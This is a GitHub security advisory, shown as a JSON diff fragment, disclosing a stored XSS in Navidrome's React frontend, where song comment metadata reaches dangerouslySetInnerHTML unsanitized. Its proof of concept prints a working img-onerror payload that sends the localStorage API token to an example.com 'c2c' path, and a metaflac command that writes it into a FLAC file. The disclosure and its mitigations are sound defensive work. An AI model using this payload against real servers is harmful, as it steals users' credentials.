+ "details": "### Summary\n\nAn XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.\n\nAn attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.\n\n### Details\n\nThe frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.\n\nIn some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.\n\nIn `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property. \n\n```js\n<div\n data-testid={`${source}.${idx}`}\n key={md5(line + idx)}\n dangerouslySetInnerHTML={{ __html: line }}\n/>\n```\n\nThis component is then used in the `SongInfo` and `AlbumInfo` components, when rendering the comment of the song or album. The contents of the comments field is taken verbatim from the metadata of a song, such as the VORBIS `COMMENT` comment of a FLAC file.\n\nBy crafting the contents of the comment field, an attacker can inject code into the frontend, which runs whenever a user views the song or album info.\n\nAdditionally, as the Navidrome API token is kept in local storage and since there's no CSP in place unless the user's configured one outside of Navidrome, the attacker can exfiltrate the API token.\n\n### PoC\n\n1. Modify the comment field of a song to contain the following payload using a tool like MusicBrain'z Picard:\n\n```js\n<img src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)\" />\n```\n\nor use `metaflac`:\n\n```shell\necho '<img src=x onerror=\"fetch(`https://example.com/c2c/${localStorage.getItem('token')}`)\" />' | metaflac --set-tag=comment=<(cat) file.flac\n```\n\n2. Add the song to Navidrome\n3. Enter the \"Songs\" or one of the albums page, click the \"kebab menu\" and then \"Get Info\"\n\nIn this payload, a broken image can be seen in the info dialog.\n\n<img width=\"996\" height=\"660\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1467cdff-17b2-4dc6-9fb5-0a83c021ca04\" />\n\nIn the developer tools' network inspector, the request exfiltrating the token to an example domain can be seen.\n\n<img width=\"410\" height=\"34\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3f668797-63a6-4355-ae57-e95bde444143\" />\n\n\n### Impact\n\nThe vulnerability affects users of the Navidrome UI with songs from untrusted sources.\n\n### Mitigations\n\n- Users of Navidrome should configure a strict [[Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) in their reverse-proxy to make exfiltration more difficult\n- Users of Navidrome should not index songs from untrusted sources without first vetting their metadata",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments